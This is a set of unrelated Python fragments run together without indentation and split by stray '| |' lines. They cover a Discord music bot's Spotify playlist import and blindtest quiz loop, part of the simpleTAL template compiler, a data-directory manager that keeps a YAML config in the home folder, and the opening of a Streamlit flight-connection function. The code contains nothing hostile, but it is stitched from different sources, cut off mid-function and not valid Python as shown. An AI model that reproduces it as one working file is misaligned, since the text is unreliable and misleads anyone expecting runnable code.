if len(res['tracks']['items']) != tracks_found:
results['failed'] = len(
res['tracks']['items']) - tracks_found
if num % 5 == 0 or num == tracks_found:
await procmesg.edit(content=f"`{num}/{tracks_found}` - {base_content}")
try:
await procmesg.delete()
except discord.HTTPException:
pass
if tracks_found == 0:
raise SpotifyError(
get_str(ctx, "music-spotify-all-failed"))
elif query.startswith('artist:') and not infinite_loop:
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_artist_albums(query)
items = res['items']
albums = [
item for item in items if item['album_type'] == 'album']
if albums:
album = random.choice(albums)
elif items:
album = random.choice(items)
else:
raise SpotifyError(
get_str(ctx, "music-spotify-not-supported"))
return await self.prepare_spotify(ctx, album['uri'], infinite_loop=True)
elif query.startswith('user:') and 'playlist:' in query:
user = query.split(":",)[1]
query = query.split(":", 3)[3]
res = await self.bot.spotify.get_playlist(user, query)
procmesg = await ctx.send(get_str(ctx, "music-spotify-processing-p").format(f"`{res['name']}`"))
base_content = procmesg.content
tracks_found = len(res['tracks']['items'])
for num, i in enumerate(res['tracks']['items'][:max_tracks], start=1):
try:
query = i['track']['name'] + ' ' + \
i['track']['artists'][0]['name']
log.debug('[Spotify] Processing {0}'.format(query))
song = await self.prepare_url(query=query, node=node)
results['tracks'].append(song['tracks'][0])
results['loadType'] = "PLAYLIST_LOADED"
results['playlistInfo'] = {
'selectedTrack': -1, 'name': res['name']}
log.debug(
'[Spotify] Processing finished for {0}'.format(query))
except (KeyError, IndexError, TypeError):
tracks_found -= 1
if len(res['tracks']['items']) != tracks_found:
results['failed'] = len(
res['tracks']['items']) - tracks_found
if num % 5 == 0 or num == tracks_found:
await procmesg.edit(content=f"`{num}/{tracks_found}` - {base_content}")
try:
await procmesg.delete()
except discord.HTTPException:
pass
if tracks_found == 0:
raise SpotifyError(
get_str(ctx, "music-spotify-all-failed"))
elif query.startswith('playlist:') and not infinite_loop:
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_playlist_tracks(query)
author = res['items'][0]['added_by']['uri']
query = original_query.replace('spotify:', f'{author}:')
return await self.prepare_spotify(ctx, query, infinite_loop=True)
else:
raise SpotifyError(
get_str(ctx, "music-spotify-not-supported"))
log.debug('[Spotify] Process finished.')
return results
else:
raise SpotifyError(get_str(ctx, "music-spotify-disabled"))
else:
raise SpotifyError(get_str(ctx, "music-spotify-not-supported"))
async def autoplaylist_loop(self, player, error_count=0):
"""Autoplaylist auto-add song loop"""
if player.connected_channel and player.is_connected and not player.is_playing and player.autoplaylist and not player.queue:
# if not sum(1 for m in player.connected_channel.members if not (m.voice.deaf or m.bot or m.voice.self_deaf)):
# log.info("[Autoplaylist] Disabling autoplaylist cus I'm alone.")
# player.autoplaylist = None
# return False
if not player.list:
player.list = player.autoplaylist['songs'].copy()
player.list.reverse()
if player.list:
if len(player.list) > 1 and player.autoplaylist['shuffle']:
random.shuffle(player.list)
song_url = player.list.pop()
if player.now and player.now.uri == song_url: # avoid the same song to be played twice in a row
new = player.list.pop()
player.list.append(song_url)
song_url = new
else:
song_url = player.list.pop()
results = await self.prepare_url(query=song_url, node=player.node)
if results and results['tracks']:
track = results['tracks'][0]
track = self.prepare_track(track)
player.add(requester=player.authorplaylist.id, track=track)
if not player.is_playing: # useless check but who knows ?
await self.player_play(player, song_url)
return True
else:
try:
player.autoplaylist['songs'].remove(song_url)
except ValueError:
pass
if 'removed' in results.get('exception', {}).get('message', '').lower():
return await self.autoplaylist_loop(player)
if error_count < 3: # if 3 fails in a row.. stop trying.
return await self.autoplaylist_loop(player, error_count=error_count + 1)
return False
def find_best_result(self, results):
not_good = ('amv', ' ep', ' ép', 'trailer', 'openings',
'all opening', 'endings', 'scene')
is_good = ('opening', 'ending', 'ost', 'op', 'ed', 'end')
best_results = results['tracks'].copy()
for result in results['tracks']:
title = result['info']['title']
if any(m in title.lower() for m in not_good):
best_results.remove(result)
continue
for word in title.split(' '):
if word.lower() in is_good:
return result
if any(m in title.lower() for m in is_good):
return result
return best_results[0]
async def blindtest_loop(self, player, check=False, error_count=0):
"""Blindtest auto-add song loop"""
if not player.blindtest.channel:
return False
channel = self.bot.get_channel(int(player.blindtest.channel))
if check and not player.blindtest.listening_mode:
if player.blindtest.current_song and not player.blindtest.current_song.found:
player.blindtest.current_song.found = True
if channel and player.blindtest.current_task:
await self.blindtest_embed(p=player, channel=channel)
if not player.blindtest.is_running:
await player.blindtest.stop(bypass=True)
player.blindtest.clean_tasks()
if player.blindtest.is_running and player.is_connected and player.connected_channel and not player.is_playing and not player.queue:
if not player.blindtest.listening_mode:
asyncio.ensure_future(self.delete_old_npmsg(player))
player.channel = None
if not sum(1 for m in player.connected_channel.members if not (m.voice.deaf or m.bot or m.voice.self_deaf)):
log.debug("[Blintest] Disabling blindtest cus I'm alone on {}.".format(
player.connected_channel.guild.name))
await player.blindtest.stop()
return False
if player.blindtest.next_song:
song = player.blindtest.next_song
player.blindtest.current_song = player.blindtest.next_song
else:
song = player.blindtest.pop()
player.blindtest.next_song = None
song_url = player.blindtest.get_song_keywords()
results = await self.prepare_url(query=song_url, node=player.node, source=player.blindtest.source)
if results and results['tracks']:
track = self.find_best_result(results)
# not sure if it's usefull for blindtest lul
track = self.prepare_track(track)
if not song.title:
song.title = track['info']['title']
player.blindtest.current_song.video_url = track['info']['uri']
player.blindtest.current_song.video_name = track['info']['title']
if not player.blindtest.listening_mode:
await song.add_alternative_titles(track['info']['title'])
track['info']['title'] = "Blindtest"
track['info']['uri'] = "https://watora.xyz/"
track['info']['artwork'] = None
if player not in self.bot.lavalink.players.players.values():
return False # Who knows at it could take some times before being here
player.add(
requester=player.node._manager._lavalink.bot.user.id, track=track)
if not player.is_playing: # useless check but who knows ?
await self.player_play(player, song_url)
if channel and not player.blindtest.listening_mode:
await channel.send(get_str(channel.guild, 'cmd-blindtest-next-song', bot=self.bot))
player.blindtest.current_task.append(asyncio.ensure_future(
self.wait_blindtest_answer(player, channel)))
return True
elif error_count < 5:
return await self.blindtest_loop(player, error_count=error_count + 1)
return False
async def wait_blindtest_answer(self, player, channel):
""" Waits for the right answer to happen """
def check(m):
if m.channel.id != player.blindtest.channel:
return False
if m.author.bot:
return False
if not channel:
return False
if not m.content:
return False
if not player.is_connected:
return False
if len(m.content) > 120:
return False
return player.blindtest.answer_is_valid(query=m.content)
scd_embed = discord.Embed(title=get_str(
channel.guild, "cmd-blindtest-rank", bot=self.bot))
response_message = None
point = 0
player.blindtest.current_song.started_at = current_time()
try:
# Why it would wait more than 5 mins ??
response_message = await self.bot.wait_for('message', timeout=max(3, min(player.blindtest.timeout, 300)), check=check)
except asyncio.TimeoutError:
if player not in self.bot.lavalink.players.players.values():
return
if player.blindtest.songs and not player.blindtest.next_song:
player.blindtest.pop(next=True)
await player.blindtest.next_song.add_alternative_titles()
player.blindtest.current_song.found_reason = get_str(
channel.guild, "cmd-blindtest-timeout", bot=self.bot)
asyncio.ensure_future(player.skip())
# no await here cus otherwise it'll be cancelled
# while loading the shit.. anyway, just keep it
return
else:
if player not in self.bot.lavalink.players.players.values():
return
cid = str(response_message.author.id)
mega_bonus = (response_message.content ==
player.blindtest.current_song.title)
naked_query = re.sub(
r'\W+', ' ', player.blindtest.current_song.title).strip()
bonus = (response_message.content.lower() in [
player.blindtest.current_song.title.lower(), naked_query])
point = 3 if mega_bonus else (2 if bonus else 1)
if cid in player.blindtest.points:
player.blindtest.points[cid] += point
else:
player.blindtest.points[cid] = point
player.blindtest.current_song.found = True
await self.blindtest_embed(p=player, channel=channel, msg=response_message, bonus=point)
scd_embed = await player.blindtest.get_classement(embed=scd_embed)
if player.blindtest.songs:
await channel.send(embed=scd_embed)
if not player.blindtest.next_song:
player.blindtest.pop(next=True)
await player.blindtest.next_song.add_alternative_titles()
if player.blindtest.wait:
await asyncio.sleep(min(30, max(0, int(player.blindtest.wait))))
asyncio.ensure_future(player.skip())
# no await here cus otherwise it'll be cancelled by itself
# while loading the shit.. anyway, just keep it
return
asyncio.ensure_future(player.blindtest.stop(bypass=True))
async def blindtest_embed(self, p, channel, msg=None, bonus=0):
guild = self.bot.get_guild(int(p.guild_id))
color = self.get_color(msg.guild if msg else guild)
embed = discord.Embed(
colour=color, title=f"**{p.blindtest.current_song.title}**", url=p.blindtest.current_song.url)
embed.description = f'{get_str(channel.guild, "cmd-blindtest-video", bot=self.bot)} : **[{p.blindtest.current_song.video_name}]({p.blindtest.current_song.video_url})**'
if bonus:
embed.description += '\n' + get_str(channel.guild, 'cmd-blindtest-{}'.format(
['good', 'very-good', 'perfect'][bonus - 1]), bot=self.bot)
if p.blindtest.current_song.image_url:
embed.set_thumbnail(url=p.blindtest.current_song.image_url)
else:
thumb = await self.get_thumbnail(p.now, p)
if thumb:
embed.set_thumbnail(url=thumb)
if msg:
embed.set_footer(text=get_str(channel.guild, "cmd-blindtest-found-in", bot=self.bot,
can_owo=False).format(round(current_time() - p.blindtest.current_song.started_at, 2)))
requester = msg.author
embed.set_author(
name=requester.name, icon_url=requester.avatar_url or requester.default_avatar_url)
else:
if not p.blindtest.current_song.found_reason:
p.blindtest.current_song.found_reason = get_str(
channel.guild, "cmd-blindtest-not-found", bot=self.bot)
embed.set_author(name=p.blindtest.current_song.found_reason)
await channel.send(embed=embed)
async def autoplay_loop(self, player, attempt=0):
"""Auto play related son when queue ends."""
settings = await SettingsDB.get_instance().get_guild_settings(int(player.guild_id))
if player.is_connected and player.connected_channel and not player.is_playing and settings.autoplay and not player.queue and (attempt < 10):
if not sum(1 for m in player.connected_channel.members if not (m.voice.deaf or m.bot or m.voice.self_deaf)):
return False
previous = player.now or player.previous or player.current
if not previous:
return False
if 'yout' not in previous.uri.lower():
| |
('metal')
self.log = logging.getLogger ("simpleTAL.TemplateCompiler")
def setTALPrefix (self, prefix):
self.tal_namespace_prefix = prefix
self.tal_namespace_omittag = '%s:omit-tag' % self.tal_namespace_prefix
self.tal_attribute_map = {}
self.tal_attribute_map ['%s:attributes'%prefix] = TAL_ATTRIBUTES
self.tal_attribute_map ['%s:content'%prefix]= TAL_CONTENT
self.tal_attribute_map ['%s:define'%prefix] = TAL_DEFINE
self.tal_attribute_map ['%s:replace'%prefix] = TAL_REPLACE
self.tal_attribute_map ['%s:omit-tag'%prefix] = TAL_OMITTAG
self.tal_attribute_map ['%s:condition'%prefix] = TAL_CONDITION
self.tal_attribute_map ['%s:repeat'%prefix] = TAL_REPEAT
def setMETALPrefix (self, prefix):
self.metal_namespace_prefix = prefix
self.metal_attribute_map = {}
self.metal_attribute_map ['%s:define-macro'%prefix] = METAL_DEFINE_MACRO
self.metal_attribute_map ['%s:use-macro'%prefix] = METAL_USE_MACRO
self.metal_attribute_map ['%s:define-slot'%prefix] = METAL_DEFINE_SLOT
self.metal_attribute_map ['%s:fill-slot'%prefix] = METAL_FILL_SLOT
def popTALNamespace (self):
newPrefix = self.tal_namespace_prefix_stack.pop()
self.setTALPrefix (newPrefix)
def popMETALNamespace (self):
newPrefix = self.metal_namespace_prefix_stack.pop()
self.setMETALPrefix (newPrefix)
def tagAsText (self, tagObj, singletonFlag=0):
""" This returns a tag as text.
"""
tag,atts = tagObj
result = ["<"]
result.append (tag)
for attName, attValue in atts:
result.append (' ')
result.append (attName)
result.append ('="')
result.append (html.escape (attValue, quote=1))
result.append ('"')
if (singletonFlag):
result.append (" />")
else:
result.append (">")
return "".join (result)
def getTemplate (self):
template = Template (self.commandList, self.macroMap, self.symbolLocationTable)
return template
def addCommand (self, command):
if (command[0] == TAL_OUTPUT and (len (self.commandList) > 0) and self.commandList[-1][0] == TAL_OUTPUT):
# We can combine output commands
self.commandList[-1] = (TAL_OUTPUT, self.commandList[-1][1] + command[1])
else:
self.commandList.append (command)
def addTag (self, tag, tagProperties={}):
""" Used to add a tag to the stack. Various properties can be passed in the dictionary
as being information required by the tag.
Currently supported properties are:
'command' - The (command,args) tuple associated with this command
'originalAtts' - The original attributes that include any metal/tal attributes
'endTagSymbol' - The symbol associated with the end tag for this element
'popFunctionList' - A list of functions to execute when this tag is popped
'singletonTag' - A boolean to indicate that this is a singleton flag
"""
# Add the tag to the tagStack (list of tuples (tag, properties, useMacroLocation))
self.log.debug ("Adding tag %s to stack" % tag[0])
command = tagProperties.get ('command',None)
originalAtts = tagProperties.get ('originalAtts', None)
singletonTag = tagProperties.get ('singletonTag', 0)
if (command is not None):
if (command[0] == METAL_USE_MACRO):
self.tagStack.append ((tag, tagProperties, len (self.commandList)+1))
else:
self.tagStack.append ((tag, tagProperties, None))
else:
self.tagStack.append ((tag, tagProperties, None))
if (command is not None):
# All tags that have a TAL attribute on them start with a 'start scope'
self.addCommand((TAL_START_SCOPE, (originalAtts, tag[1])))
# Now we add the TAL command
self.addCommand(command)
else:
# It's just a straight output, so create an output command and append it
self.addCommand((TAL_OUTPUT, self.tagAsText (tag, singletonTag)))
def popTag (self, tag, omitTagFlag=0):
""" omitTagFlag is used to control whether the end tag should be included in the
output or not. In HTML 4.01 there are several tags which should never have
end tags, this flag allows the template compiler to specify that these
should not be output.
"""
while (len (self.tagStack) > 0):
oldTag, tagProperties, useMacroLocation = self.tagStack.pop()
endTagSymbol = tagProperties.get ('endTagSymbol', None)
popCommandList = tagProperties.get ('popFunctionList', [])
singletonTag = tagProperties.get ('singletonTag', 0)
for func in popCommandList:
func()
self.log.debug ("Popped tag %s off stack" % oldTag[0])
if (oldTag[0] == tag[0]):
# We've found the right tag, now check to see if we have any TAL commands on it
if (endTagSymbol is not None):
# We have a command (it's a TAL tag)
# Note where the end tag symbol should point (i.e. the next command)
self.symbolLocationTable [endTagSymbol] = len (self.commandList)
# We need a "close scope and tag" command
self.addCommand((TAL_ENDTAG_ENDSCOPE, (tag[0], omitTagFlag, singletonTag)))
return
elif (omitTagFlag == 0 and singletonTag == 0):
# We are popping off an un-interesting tag, just add the close as text
self.addCommand((TAL_OUTPUT, '</' + tag[0] + '>'))
return
else:
# We are suppressing the output of this tag, so just return
return
else:
# We have a different tag, which means something like <br> which never closes is in
# between us and the real tag.
# If the tag that we did pop off has a command though it means un-balanced TAL tags!
if (endTagSymbol is not None):
# ERROR
msg = "TAL/METAL Elements must be balanced - found close tag %s expecting %s" % (tag[0], oldTag[0])
self.log.error (msg)
raise TemplateParseException (self.tagAsText(oldTag), msg)
self.log.error ("Close tag %s found with no corresponding open tag." % tag[0])
raise TemplateParseException ("</%s>" % tag[0], "Close tag encountered with no corresponding open tag.")
def parseStartTag (self, tag, attributes, singletonElement=0):
# Note down the tag we are handling, it will be used for error handling during
# compilation
self.currentStartTag = (tag, attributes)
# Look for tal/metal attributes
foundTALAtts = []
foundMETALAtts = []
foundCommandsArgs = {}
cleanAttributes = []
originalAttributes = {}
tagProperties = {}
popTagFuncList = []
TALElementNameSpace = 0
prefixToAdd = ""
tagProperties ['singletonTag'] = singletonElement
# Determine whether this element is in either the METAL or TAL namespace
if (tag.find (':') > 0):
# We have a namespace involved, so let's look to see if its one of ours
namespace = tag[0:tag.find (':')]
if (namespace == self.metal_namespace_prefix):
TALElementNameSpace = 1
prefixToAdd = self.metal_namespace_prefix +":"
elif (namespace == self.tal_namespace_prefix):
TALElementNameSpace = 1
prefixToAdd = self.tal_namespace_prefix +":"
if (TALElementNameSpace):
# We should treat this an implicit omit-tag
foundTALAtts.append (TAL_OMITTAG)
# Will go to default, i.e. yes
foundCommandsArgs [TAL_OMITTAG] = ""
for att, value in attributes:
originalAttributes [att] = value
if (TALElementNameSpace and not att.find (':') > 0):
# This means that the attribute name does not have a namespace, so use the prefix for this tag.
commandAttName = prefixToAdd + att
else:
commandAttName = att
self.log.debug ("Command name is now %s" % commandAttName)
if (att[0:5] == "xmlns"):
# We have a namespace declaration.
prefix = att[6:]
if (value == METAL_NAME_URI):
# It's a METAL namespace declaration
if (len (prefix) > 0):
self.metal_namespace_prefix_stack.append (self.metal_namespace_prefix)
self.setMETALPrefix (prefix)
# We want this function called when the scope ends
popTagFuncList.append (self.popMETALNamespace)
else:
# We don't allow METAL/TAL to be declared as a default
msg = "Can not use METAL name space by default, a prefix must be provided."
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
elif (value == TAL_NAME_URI):
# TAL this time
if (len (prefix) > 0):
self.tal_namespace_prefix_stack.append (self.tal_namespace_prefix)
self.setTALPrefix (prefix)
# We want this function called when the scope ends
popTagFuncList.append (self.popTALNamespace)
else:
# We don't allow METAL/TAL to be declared as a default
msg = "Can not use TAL name space by default, a prefix must be provided."
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
else:
# It's nothing special, just an ordinary namespace declaration
cleanAttributes.append ((att, value))
elif (commandAttName in self.tal_attribute_map):
# It's a TAL attribute
cmnd = self.tal_attribute_map [commandAttName]
if (cmnd == TAL_OMITTAG and TALElementNameSpace):
self.log.warning ("Supressing omit-tag command present on TAL or METAL element")
else:
foundCommandsArgs [cmnd] = value
foundTALAtts.append (cmnd)
elif (commandAttName in self.metal_attribute_map):
# It's a METAL attribute
cmnd = self.metal_attribute_map [commandAttName]
foundCommandsArgs [cmnd] = value
foundMETALAtts.append (cmnd)
else:
cleanAttributes.append ((att, value))
tagProperties ['popFunctionList'] = popTagFuncList
# This might be just content
if ((len (foundTALAtts) + len (foundMETALAtts)) == 0):
# Just content, add it to the various stacks
self.addTag ((tag, cleanAttributes), tagProperties)
return
# Create a symbol for the end of the tag - we don't know what the offset is yet
self.endTagSymbol += 1
tagProperties ['endTagSymbol'] = self.endTagSymbol
# Sort the METAL commands
foundMETALAtts.sort()
# Sort the tags by priority
foundTALAtts.sort()
# We handle the METAL before the TAL
allCommands = foundMETALAtts + foundTALAtts
firstTag = 1
for talAtt in allCommands:
# Parse and create a command for each
cmnd = self.commandHandler [talAtt](foundCommandsArgs[talAtt])
if (cmnd is not None):
if (firstTag):
# The first one needs to add the tag
firstTag = 0
tagProperties ['originalAtts'] = originalAttributes
tagProperties ['command'] = cmnd
self.addTag ((tag, cleanAttributes), tagProperties)
else:
# All others just append
self.addCommand(cmnd)
if (firstTag):
tagProperties ['originalAtts'] = originalAttributes
tagProperties ['command'] = (TAL_STARTTAG, (tag, singletonElement))
self.addTag ((tag, cleanAttributes), tagProperties)
else:
# Add the start tag command in as a child of the last TAL command
self.addCommand((TAL_STARTTAG, (tag,singletonElement)))
def parseEndTag (self, tag):
""" Just pop the tag and related commands off the stack. """
self.popTag ((tag,None))
def parseData (self, data):
# Just add it as an output
self.addCommand((TAL_OUTPUT, data))
def compileCmdDefine (self, argument):
# Compile a define command, resulting argument is:
# [(isLocalFlag (Y/n), variableName, variablePath),...]
# Break up the list of defines first
commandArgs = []
# We only want to match semi-colons that are not escaped
argumentSplitter = re.compile ('(?<!;);(?!;)')
for defineStmt in argumentSplitter.split (argument):
# remove any leading space and un-escape any semi-colons
defineStmt = defineStmt.lstrip().replace (';;', ';')
# Break each defineStmt into pieces "[local|global] varName expression"
stmtBits = defineStmt.split (' ')
isLocal = 1
if (len (stmtBits) < 2):
# Error, badly formed define command
msg = "Badly formed define command '%s'. Define commands must be of the form: '[local|global] varName expression[;[local|global] varName expression]'" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Assume to start with that >2 elements means a local|global flag
if (len (stmtBits) > 2):
if (stmtBits[0] == 'global'):
isLocal = 0
varName = stmtBits[1]
expression = ' '.join (stmtBits[2:])
elif (stmtBits[0] == 'local'):
varName = stmtBits[1]
expression = ' '.join (stmtBits[2:])
else:
# Must be a space in the expression that caused the >3 thing
varName = stmtBits[0]
expression = ' '.join (stmtBits[1:])
else:
# Only two bits
varName = stmtBits[0]
expression = ' '.join (stmtBits[1:])
commandArgs.append ((isLocal, varName, expression))
return (TAL_DEFINE, commandArgs)
def compileCmdCondition (self, argument):
# Compile a condition command, resulting argument is:
# path, endTagSymbol
# Sanity check
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! condition commands must be of the form: 'path'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
return (TAL_CONDITION, (argument, self.endTagSymbol))
def compileCmdRepeat (self, argument):
# Compile a repeat command, resulting argument is:
# (varname, expression, endTagSymbol)
attProps = argument.split (' | |
import glob
import os
from pathlib import Path
import yaml
from typing import Any, Dict, List, Union
import warnings
from .data_interface import MagicDataInterface
from .self_aware_data import SelfAwareData, SelfAwareDataInterface
DIRS_TO_IGNORE = ['__pycache__']
class DataDirectoryManager:
config_file_name = '.data_map.yaml'
@classmethod
def register_project(cls, project_hint: str, project_path: str) -> None:
"""
Register project and its data path to the config.
If no config exists, create one.
Args:
project_hint: Name for project
project_path: Path to project's data directory
Raises: ValueError if project_hint already exists in file
"""
# check that project_path is a valid path
expanded_project_path = Path(project_path).expanduser()
if not expanded_project_path.exists():
raise FileNotFoundError("Not a valid path: '{}'".format(project_path))
config_file_path = Path(Path.home(), cls.config_file_name)
if not config_file_path.exists():
cls._init_config()
config = cls._load_config()
hint_already_in_file = cls._check_for_entry_in_config(project_hint, config)
if hint_already_in_file:
raise ValueError("Project hint '{}' is already registered".format(project_hint))
cls._register_project_to_file(project_hint, expanded_project_path, config_file_path)
@classmethod
def load_project_path_from_hint(cls, hint):
"""
Determine the data_path from the hint.
Look for a data_map config, and look for hint within the config.
Otherwise, the hint may be a legitimate path, in which case use it.
If neither of the above work, raise an error.
Args:
hint: project hint previously registered, or a real path.
Returns: path registered for the hint
"""
if cls._config_exists():
config = cls._load_config()
if config is not None and hint in config:
expanded_config_path = Path(config[hint]['path']).expanduser().resolve()
if expanded_config_path.exists():
return expanded_config_path
else:
raise ValueError("Path provided in config for '{}' does not exist: {}".format(hint,
expanded_config_path))
expanded_path = Path(hint).expanduser().resolve()
if expanded_path.exists():
return expanded_path
raise ValueError("Provided hint '{}' is not registered and is not a valid path. "
"\n\nRegister your project with `DataManager.register_project(project_hint, project_path)`"
"".format(hint))
@classmethod
def list_projects(cls) -> None:
"""List the projects known to `DataManager`."""
config = cls._load_config()
if len(config) == 0:
print("No projects registered!")
for project_hint in config:
print("{}: {}".format(project_hint, config[project_hint]['path']))
@classmethod
def _init_config(cls):
"""Create an empty config file."""
config_path = Path(Path.home(), cls.config_file_name)
print("Creating config at {}".format(config_path))
open(config_path.__str__(), 'x').close()
@classmethod
def _config_exists(cls) -> bool:
"""Determine whether a config file exists"""
config_path = Path(Path.home(), cls.config_file_name)
if config_path.exists():
return True
else:
return False
@classmethod
def _load_config(cls) -> Dict:
"""Load the config file. If config file is empty, return an empty dict."""
config_path = Path(Path.home(), cls.config_file_name)
if cls._config_exists():
config = yaml.safe_load(open(config_path.__str__()))
if config is None:
config = {}
return config
else:
raise FileNotFoundError('Config file not found at: {}'.format(config_path))
@staticmethod
def _check_for_entry_in_config(project_hint: str, config: Dict) -> bool:
"""
Returns whether project_hint already exists in config file.
Args:
project_hint: Name for the project.
config: The config dict.
Returns: Bool for whether the project_hint is registered in the config.
"""
if config is None:
return False
if project_hint in config:
return True
else:
return False
@classmethod
def _get_path_for_project_hint(cls, project_hint: str, config: Dict) -> Path:
if cls._check_for_entry_in_config(project_hint, config):
return Path(config[project_hint]['path'])
else:
raise ValueError("Project hint '{}' is not registered".format(project_hint))
@staticmethod
def _register_project_to_file(project_hint: str, project_path: Path, config_file_path: Path):
"""
Appends project details to specified config file.
Args:
project_hint: The name for the project.
project_path: Path to project data directory.
config_file_path: Path to config file.
Returns: None.
"""
config_entry_data = {
project_hint: {
'path': project_path.__str__(),
}
}
with open(config_file_path.__str__(), 'a') as f:
yaml.dump(config_entry_data, f, default_flow_style=False)
class TestingDataDirectoryManager(DataDirectoryManager):
"""DataDirectoryManager useful for testing purposes, as it does not interact with the file system."""
@classmethod
def _config_exists(cls):
return True
@classmethod
def _load_config(cls) -> Dict:
return {'test': '.'}
@staticmethod
def _register_project_to_file(project_hint: str, project_path: Path, config_file_path: Path):
return
class DataDirectory:
"""Manages saving, loading, and viewing data files within a specific data path."""
data_dir_manager = DataDirectoryManager
def __init__(self, path: str, contents: Dict[str, 'DataDirectory'] = None,
magic_data_interface=MagicDataInterface):
"""
Initialize a DataDirectory at a path. The contents of that DataDirectory are recursively characterized and the
DataDirectory's data_type set. For testing purposes, the contents can also be set directly.
Args:
path: A file path at which to instantiate the DataDirectory.
contents: The files and subdirectories contained in the directory.
magic_data_interface: MagicDataInterface object to use to interface with files.
"""
self.path = Path(path).expanduser().resolve()
if not self.path.exists():
warnings.warn('DataDirectory path does not exist: {}'.format(self.path), RuntimeWarning)
self.name = os.path.basename(self.path)
if contents is None:
self.contents = self._characterize_dir(self.path)
else:
self.contents = contents
# determine_data_type has to be done _after_ characterize dir because it inspects the children
self.data_type = self._determine_data_type()
self.magic_data_interface = magic_data_interface
@classmethod
def register_project(cls, project_hint: str, project_path: str) -> None:
"""Register a hint for a project data directory so that it can be easily reloaded via `load(hint)`."""
return cls.data_dir_manager.register_project(project_hint, project_path)
@classmethod
def list_projects(cls) -> None:
"""List all data directories previously registered via `register_project`."""
return cls.data_dir_manager.list_projects()
@classmethod
def load_project(cls, hint):
"""Create a DataDirectory from a project hint previously registered via `register_project`."""
path = cls.data_dir_manager.load_project_path_from_hint(hint)
return cls(path)
@classmethod
def load(cls, hint):
"""Shortcut for `load_project`."""
return cls.load_project(hint)
def __getitem__(self, key):
return self.contents[key]
def reload(self):
self.contents = self._characterize_dir(self.path)
def is_file(self):
return False
def _determine_data_type(self) -> str:
dir_data_types = [self.contents[f].data_type for f in self.contents]
unique_dir_data_types = list(set(dir_data_types))
if len(unique_dir_data_types) == 0:
return 'empty'
elif len(unique_dir_data_types) > 1:
return 'mixed'
else:
return unique_dir_data_types[0]
def select(self, hint: str) -> Union['DataDirectory', 'DataFile']:
"""Return the DataDirectory from self.contents that matches the hint.
If more than one file matches the hint, then select the one that file whose type matches the hint exactly.
Otherwise raise an error and display all matches.
Args:
hint: string to use to search for a file within the directory.
Raises:
FileNotFoundError: if no file can be found in the data directory that matches the hint.
ValueError: if more than one file is found in the data directory that matches the hint.
"""
matches = [self.contents[d] for d in self.contents if hint in self.contents[d].name]
if len(matches) == 1:
return matches[0]
elif len(matches) == 0:
raise FileNotFoundError("No match for hint '{}'".format(hint))
elif len(matches) > 1:
exact_matches = [self.contents[d] for d in self.contents if hint == self.contents[d].data_type]
if len(exact_matches) == 1:
return exact_matches[0]
elif len(exact_matches) == 0:
match_names = [m.name for m in matches]
raise ValueError("More than one match found: [{}]".format(', '.join(match_names)))
elif len(exact_matches) > 1:
match_names = [m.name for m in exact_matches]
raise ValueError("More than one match found: [{}]".format(', '.join(match_names)))
def latest(self) -> Union['DataDirectory', 'DataFile']:
"""Return the latest data file or directory, as determined alphabetically."""
if len(self.contents) == 0:
return None
sorted_contents = sorted([d for d in self.contents])
latest_content = sorted_contents[-1]
return self.contents[latest_content]
def save(self, data: Any, file_name: str, **kwargs) -> None:
"""
Save a data object within the data directory.
Args:
data: data object to save.
file_name: file name for the saved object, including file extension. The file extension is used to determine
the file type and method for saving the data.
**kwargs: Remaining args are passed to the data interface save function.
"""
if type(data) == SelfAwareData:
new_data_dir = self._save_self_aware_data(data, file_name, **kwargs)
else:
new_data_dir = self._save_file(data, file_name, **kwargs)
self.contents[new_data_dir.name] = new_data_dir
def _save_file(self, data: Any, file_name: str, **kwargs) -> 'DataFile':
saved_file_path = self.magic_data_interface.save(data, str(Path(self.path, file_name)), **kwargs)
return DataFile(saved_file_path)
def _save_self_aware_data(self, data: Any, file_name: str, **kwargs) -> 'SelfAwareDataDirectory':
new_transform_dir_path = SelfAwareDataInterface.save(data, parent_path=self.path, file_name=file_name, **kwargs)
return SelfAwareDataDirectory(new_transform_dir_path)
def mkdir(self, dir_name: str):
"""
Create a new directory within the current directory.
Args:
dir_name: Name for the new directory
Returns: None
"""
dir_path = Path(self.path, dir_name)
os.makedirs(dir_path)
self.contents[dir_name] = DataDirectory(dir_path)
@staticmethod
def _characterize_dir(path) -> Dict[str, 'DataDirectory']:
"""
Characterize the contents of the DataDirectory, creating new DataDirectories for subdirectories and DataFiles
for files.
Args:
path: File path to characterize.
Returns: A Dictionary of file/directory names (str) to DataDirectory/DataFile objects.
"""
contents = {}
glob_path = Path(path, '*')
subpaths = glob.glob(glob_path.__str__())
for p in subpaths:
name = os.path.basename(p)
if name in DIRS_TO_IGNORE:
continue
if os.path.isdir(p):
if 'sad_dir' in p or 'transformed_data_dir' in p:
data_directory = SelfAwareDataDirectory(p)
else:
data_directory = DataDirectory(p)
contents[data_directory.name] = data_directory
elif os.path.isfile(p):
contents[name] = DataFile(p)
else:
print('WARNING: {} is neither a file nor a directory.'.format(p))
return contents
def ls(self, full=False) -> None:
"""
Print the contents of the data directory. Defaults to printing all subdirectories, but not all files.
Args:
full: Whether to print all files.
"""
contents_ls_tree = self._build_ls_tree(full=full)
self._print_ls_tree(contents_ls_tree)
def _build_ls_tree(self, full: bool = False, top_dir: bool = True) -> Dict[str, List]:
"""
Recursively navigate the data directory tree and build a | |
False:
dfs[which_ix] = df2
if is_print and df2_isempty == False:
st.write(df2)
#display(df2)
printed_header = True
return dfs
#---------------------------------------------------------
def handleCityGraph(keep_early_arr, city, choice_ix, id_list, fsu, bookings_f, feeders, is_print=True, delay=45):
# Need to increase efficiency
#st.write("????????????????")
#st.write("Enter handleCityGraph")
#st.write("fsu.SCH_DEP_DTMZ", fsu.SCH_DEP_DTMZ)
# I need to return two structures: nodes and edges.
# This pair of structures should be returned for each flight I am working with.
# Nodes are single IDs with arr and dep times, arr and dep delays.
# Edges are double IDs with PAX, rotation, and connection times.
#st.write("Enter handleCityGraph")
# Find all inbound flights from a given city (other than PTY)
city_inbounds = findCity(bookings_f, city)
if choice_ix == 'all':
min_ix = 0
max_ix = city_inbounds.shape[0]
else:
min_ix = choice_ix
